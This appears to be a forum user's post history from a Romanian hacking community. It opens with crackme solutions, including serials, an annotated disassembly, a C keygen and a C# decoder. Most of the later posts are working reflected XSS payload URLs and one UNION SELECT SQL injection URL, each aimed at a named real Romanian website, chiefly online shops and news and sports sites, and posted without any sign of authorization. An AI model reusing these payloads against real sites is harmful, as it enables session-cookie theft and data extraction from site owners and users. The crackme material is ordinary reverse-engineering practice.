Posts posted by yulyul2004
-
Simple. The word is: FELICITARI
-
Space is 32 decimal, 20 hex (0x20, 20h, etc.).
The null char, which we have no way of typing into the textbox, is 0 decimal, 0 hex (0x00, 00h, etc.).
Moreover, the Delphi compiler uses "null terminated string", so if we put a null in the middle of the password, the password would have only 3 characters and would not pass the 8-character validation.
PS:
The original CrackMe can be found here: http://www.mibs-challenges.de/challenge.php?type=5 under the name "MiB's Challenges - CrackMe #VII"
-
User: Xdo
Pass: omr?tcst
where "?" is the 0x00 character, which I have no way of typing into the textbox.
or am I doing something wrong???
-
The "password" is: 000D87A86615.
The "password" must be set as the MAC address.
The network card that has this MAC is made by Elitegroup Computer System Co. (ECS)
-
I'd say that one is needed too, otherwise it throws IndexOutOfRangeException at str3[0x17]
-
The first crack-me of this type that I've done. It took me 15 minutes to solve.
serial1:1234567890qwerty + 0xC3 + 0x10 + 0x74 (address 0x007410C3)
serial2:1234567890qwerty + 0x59 + 0x11 + 0x74 (address 0x00741159)
Later edit:
CrackMe output:
????????????????????????????????????????????????
???? RSTCenter Crackit #04 :: Enjoy
????????????????????????????????????????????????
????
1??? Serial :1234567890qwerty?^Pt
????????????????????????????????????????????????
???? RSTCenter Crackit #04 :: Enjoy
????????????????????????????????????????????????
????
1??? Serial :1234567890qwertyY^Qt
????
????
3??? You did it! Congrats;)
???? Concatenate the words in the serials
???? to get the pass!
????
????????????????????????????????????????????????
-
The code: cool13377331å=ssaåP
-
It took me a while because I wrote the keygen in C#.
The final password is: geronimo
-
User: Gregor
Pass: 1502754
Below I've commented the asm code a bit for anyone who wants to write a keygen:
.text:00401000 _main proc near
.text:00401000
.text:00401000 var_B0 = dword ptr -0B0h
.text:00401000 Dest = byte ptr -0ACh
.text:00401000 Serial = dword ptr -78h
.text:00401000 UserSerial = dword ptr -40h
.text:00401000 UserNameLength = dword ptr -3Ch
.text:00401000 Source = byte ptr -38h
.text:00401000 var_37 = byte ptr -37h
.text:00401000 var_4 = dword ptr -4
.text:00401000 argc = dword ptr 8
.text:00401000 argv = dword ptr 0Ch
.text:00401000 envp = dword ptr 10h
.text:00401000
.text:00401000 push ebp
.text:00401001 mov ebp, esp
.text:00401003 sub esp, 0B0h
.text:00401009 push offset aKeyme1ByHertz@ ; "************************\n* Keyme 1 by H"...
.text:0040100E call _printf
.text:00401013 add esp, 4
.text:00401016 push offset aPleaseEnterYou ; "\nPlease enter your username: "
.text:0040101B call _printf
.text:00401020 add esp, 4
.text:00401023 lea eax, [ebp+Source]
.text:00401026 push eax
.text:00401027 push offset Format ; "%s"
.text:0040102C call _scanf
.text:00401031 add esp, 8
.text:00401034 lea ecx, [ebp+Source]
.text:00401037 push ecx ; Source
.text:00401038 lea edx, [ebp+Dest]
.text:0040103E push edx ; Dest
.text:0040103F call _strcpy
.text:00401044 add esp, 8
.text:00401047 push offset unk_4070EC
.text:0040104C lea eax, [ebp+Dest] ; Copy the username address in eax
.text:00401052 push eax ; Str
.text:00401053 call _strstr ; Search for 'e' in the username
.text:00401058 add esp, 8
.text:0040105B mov [ebp+var_4], eax
.text:0040105E cmp [ebp+var_4], 0
.text:00401062 jnz loc_401161 ; Go to wrong username message if Username contains 'e'
.text:00401068 lea ecx, [ebp+Dest] ; Copy the username address in ecx
.text:0040106E push ecx ; Str
.text:0040106F call _strlen ; Get username length
.text:00401074 add esp, 4
.text:00401077 mov [ebp+UserNameLength], eax
.text:0040107A cmp [ebp+UserNameLength], 5
.text:0040107E jle loc_40114D ; Jump to wrong username if username.length <= 5
.text:00401084 cmp [ebp+UserNameLength], 0Fh
.text:00401088 jge loc_40114D ; Jump to wrong username if username.length >= 0x0F
.text:0040108E mov [ebp+Serial], 1
.text:00401095 movsx edx, [ebp+Source] ; edx = first char
.text:00401099 movsx eax, [ebp+var_37] ; eax = second char
.text:0040109D add edx, eax ; edx = first char + second char
.text:0040109F mov ecx, [ebp+UserNameLength] ; Ecx = username length
.text:004010A2 movsx eax, byte ptr [ebp+ecx+UserNameLength+2] ; eax = Second last char
.text:004010A7 mov ecx, [ebp+UserNameLength] ; useless
.text:004010AA movsx ecx, byte ptr [ebp+ecx+UserNameLength+3] ; ecx = last username char
.text:004010AF add eax, ecx ; eax = eax + ecx (last two chars)
.text:004010B1 imul edx, eax ; edx = edx * eax
.text:004010B4 mov eax, [ebp+Serial] ; eax = 1
.text:004010B7 imul eax, edx ; eax = eax * edx = edx
.text:004010BA mov [ebp+Serial], eax
.text:004010BD mov [ebp+var_B0], 2
.text:004010C7 jmp short loc_4010D8
.text:004010C9 ; ---------------------------------------------------------------------------
.text:004010C9
.text:004010C9 loc_4010C9: ; CODE XREF: _main+FDj
.text:004010C9 mov ecx, [ebp+var_B0]
.text:004010CF add ecx, 1
.text:004010D2 mov [ebp+var_B0], ecx
.text:004010D8
.text:004010D8 loc_4010D8: ; CODE XREF: _main+C7j
.text:004010D8 mov edx, [ebp+UserNameLength]
.text:004010DB sub edx, 2 ; without last 2 chars
.text:004010DE cmp [ebp+var_B0], edx
.text:004010E4 jge short loc_4010FF ; check if we reached the end
.text:004010E6 mov eax, [ebp+var_B0]
.text:004010EC movsx ecx, [ebp+eax+Source] ; ecx = current char
.text:004010F1 mov edx, [ebp+Serial] ; edx = serial
.text:004010F4 add edx, ecx ; edx = serial + current char
.text:004010F6 imul edx, [ebp+UserNameLength] ; edx = edx * UserNameLength
.text:004010FA mov [ebp+Serial], edx ; save the serial
.text:004010FD jmp short loc_4010C9
.text:004010FF ; ---------------------------------------------------------------------------
.text:004010FF
.text:004010FF loc_4010FF: ; CODE XREF: _main+E4j
.text:004010FF push offset aPleaseEnterY_0 ; "\nPlease enter your key to verify: "
.text:00401104 call _printf
.text:00401109 add esp, 4
.text:0040110C lea eax, [ebp+UserSerial]
.text:0040110F push eax
.text:00401110 push offset aD ; ; "%d" - read a decimal
.text:00401115 call _scanf
.text:0040111A add esp, 8
.text:0040111D mov ecx, [ebp+UserSerial] ; User serial
.text:00401120 cmp ecx, [ebp+Serial] ; compare with generated serial
.text:00401123 jnz short loc_401139
.text:00401125 push offset aKeyIsCorrect__ ; "\nKey is correct...\n"
.text:0040112A call _printf
.text:0040112F add esp, 4
.text:00401132 call __getch
.text:00401137 jmp short loc_40114B
.text:00401139 ; ---------------------------------------------------------------------------
.text:00401139
.text:00401139 loc_401139: ; CODE XREF: _main+123j
.text:00401139 push offset aSorryYourKeyIs ; "\nSorry, your key is wrong...\n"
.text:0040113E call _printf
.text:00401143 add esp, 4
.text:00401146 call __getch
.text:0040114B
.text:0040114B loc_40114B: ; CODE XREF: _main+137j
.text:0040114B jmp short loc_40115F
.text:0040114D ; ---------------------------------------------------------------------------
.text:0040114D
.text:0040114D loc_40114D: ; CODE XREF: _main+7Ej
.text:0040114D ; _main+88j
.text:0040114D push offset aOnlyUsernamesW ; "\nOnly usernames with length between 5 a"...
.text:00401152 call _printf
.text:00401157 add esp, 4
.text:0040115A call __getch
.text:0040115F
.text:0040115F loc_40115F: ; CODE XREF: _main:loc_40114Bj
.text:0040115F jmp short loc_401173
.text:00401161 ; ---------------------------------------------------------------------------
.text:00401161
.text:00401161 loc_401161: ; CODE XREF: _main+62j
.text:00401161 push offset aSorryThisUsern ; "\nSorry, this username is not supported."...
.text:00401166 call _printf
.text:0040116B add esp, 4
.text:0040116E call __getch
.text:00401173
.text:00401173 loc_401173: ; CODE XREF: _main:loc_40115Fj
.text:00401173 mov esp, ebp
.text:00401175 pop ebp
.text:00401176 retn
.text:00401176 _main endp
-
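The serial computation commented in the listing above, re-implemented in C as an added example (not part of the original post). `keyme_serial` is a hypothetical name, and the `_strstr` filter is left out because the substring stored at `unk_4070EC` is not shown in the listing.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Recomputes the value _main builds in [ebp+Serial] (0040108E..004010FA).
 * Returns 0 and stores the serial, or -1 when the length check
 * (jle 5 / jge 0Fh) would send the program to the "wrong username" path. */
int keyme_serial(const char *name, int32_t *serial)
{
    size_t len = strlen(name);
    if (len <= 5 || len >= 0x0F)
        return -1;

    /* movsx sign-extends each byte, so treat the name as signed chars. */
    const signed char *s = (const signed char *)name;

    /* (first + second) * (second-last + last), as at 00401095..004010B1. */
    int32_t head = s[0] + s[1];
    int32_t tail = s[len - 2] + s[len - 1];

    /* Unsigned arithmetic reproduces the 32-bit wraparound of imul/add. */
    uint32_t acc = (uint32_t)head * (uint32_t)tail;

    /* Loop at 004010D8: index 2 up to, but not including, len - 2. */
    for (size_t i = 2; i < len - 2; i++)
        acc = (acc + (uint32_t)(int32_t)s[i]) * (uint32_t)len;

    *serial = (int32_t)acc;   /* the program reads the key with "%d" */
    return 0;
}

int main(void)
{
    int32_t serial;
    const char *user = "Gregor";   /* user name given in the post */

    if (keyme_serial(user, &serial) != 0) {
        puts("username length must be between 6 and 14");
        return 1;
    }
    printf("User: %s\nPass: %d\n", user, serial);
    return 0;
}
```
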
CrackMe output:
Master Yoda: To the Academy I welcome you, young Padwan !
Hmmmm.....
Doubt in your ways your spirit reveals. Your name, do you know ?
Padwan: skywalker. luke skywalker.
Master Yoda: Your name The Force has heard. It's worthy of a bright future!
....still...
Do know your place in The Universe ?
Padwan: i must follow the path of the force.
Master Yoda: Congratulations! You are wise and your spirit strong !
____________________________________________________________________________
"crackme" created by xact
The decoding function is written in C#
using System;

namespace HttpClient.RST
{
    public class CrackMe08 : IMissoin
    {
        public void Execute()
        {
            Console.WriteLine(Decode("-sdlkbvzjt fjvk!-sdlkbvzjt"));
            Console.WriteLine(Decode("-fbsng fgu gn!gu`q fgu xnmkpe!sttn j"));
        }

        /// <summary>
        /// Decodes the string.
        /// </summary>
        /// <param name="source">Encoded string.</param>
        /// <returns>Decoded string.</returns>
        private static string Decode(string source)
        {
            string result = string.Empty;
            // Walk the string backwards; shift each non-space char by +1 or -1, alternating by position.
            for (int i = source.Length - 1; i > -1; i--)
                result += source[i] != ' ' ? ((char) (source[i] + ((source.Length - i)%2 == 0 ? 1 : -1))) : ' ';
            return result;
        }
    }
}
Unfortunately I don't think I'll have time to make a CrackMe anytime soon, so... if someone else posts one I won't mind.
-
the password is 19880502
it's probably some date of birth !?!?!?.... 02/05/1988
-
I found the password. I sent you an email.
-
http://www.icr.ro/programe.php?cod=0%20union%20all%20select%201,2,3,4,%27%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E%27,6,7,8,9,0,1,2,3,4,5,6,7,8,91%20from%20dny_users%20limit%200,1--
tables:
-
http://www.rompres.ro/news.php?c=&s=&q=psd%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E&w=3&t=0&h=0
-
as promised...
better-known online stores
in the title
http://www.altex.ro/search/index.jsp?searchTerms=%3C%2F%74%69%74%6C%65%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A
without the title
http://www.altex.ro/search/index.jsp?searchTerms=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A
http://www.domo.ro/cauta?TextCautat=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
on onfocus
http://www.pcfun.ro/index.php?page=search&action=products&x=0&y=0&query=asdf+%2F%2F%22+onfocus%3D%27onfocus%3Dalert(document.cookie)%27
onfocus on the search box
http://www.pcgarage.ro/cauta/asdf%22+onfocus%3D%22alert(document.cookie)
http://www.price.ro/index.php?section=&action=search&text=%3C%2Ftitle%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E+&x=0&y=0&categ_id=1151&pretDeLa=&pretPanaLa=
http://www.price.ro/index.php?section=&action=search&text=asdf%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E+&x=31&y=12&categ_id=1151&pretDeLa=&pretPanaLa=
-
...since there are matches on tonight anyway.
if they have already been posted, I apologize, but I haven't found the forum search yet.
http://www.dinamovisti.ro/arhiva/stiri/?v=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E&x=18&y=10
http://www.stelisti.ro/arhiva/stiri/?v=%52%61%64%6F%69%20%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E\http:/
http://www.rapidisti.ro/arhiva/stiri/?v=%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E&x=0&y=0
http://www.cfrcluj1907.ro/ro/stiri/arhiva/?v=%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E
the order is purely random
-
thanks,
if I have time, next month I'll switch over to sql injection. (on .ro, obviously)
-
http://all-it.ro/src_rst.php?cautare=%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E
%70%72%6F%63%65%73%6F%72%22%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%3C%49%4D%47
http://www.azerty.ro/search/?x=0&y=0&q=procesor%22%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E%3CIMG
http://www.ecost.ro/advanced_search_result.php?search_in_description=1&keywords=%3C%2F%74%69%74%6C%65%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A&x=16&y=7
http://www.ecost.ro/advanced_search_result.php?search_in_description=1&keywords=%22%3E%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E%0A
in the title
http://www.electrofun.ro/index.php?page=search&action=products&x=0&y=0&query=%3C%2Ftitle%3E%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E+
where the search is displayed
http://www.electrofun.ro/index.php?page=search&action=products&x=0&y=0&query=%22%3CSCRIPT%3Ealert(document.cookie)%3C%2FSCRIPT%3E%3Cimg%20src=http://www.magazinultau.ro/advanced_search_result.php?keywords=%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
http://www.say-shops.ro/?pg=lista&src=%3CSCRIPT%3Ealert(document.cookie)%3C/SCRIPT%3E&tip=
I'll be back with another post with better-known stores.
if someone can remove the extra "l" from the title I'd be grateful
-
Thanks,
Glad someone appreciates it.
A list of Romanian online IT stores follows.
offtopic
I have a question: what do I have to achieve to be able to put a picture in my signature?
-
http://www.brm.ro/root/index.php?page=cauta&search=%27%3C%53%43%52%49%50%54%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%53%43%52%49%50%54%3E
-
thanks
for now I'm testing my "knowledge" on .ro sites and only posting harmless XSSes.
-
it's useless, but it took me a while to find.
on mouseover on the English link (top right)
http://www.mie.ro/cauta.php?c=comert%22%20onmouseover%3D%22alert%28document.cookie%29%22
-
http://www.findjob.ro/search.php?locuri_de_munca=%5C%3E%3C%2Ftitle%3E%3CSCRIPT%3Ealert%28document.cookie%29%3C%2FSCRIPT%3E+&oras=&submit.x=45&submit.y=12
Decrypt
in Challenges (CTF)
Posted
How many letters are there without spaces? Are they meaningful words? Do they make sense together? Do you have a reverse algorithm? Or did you use hashing functions?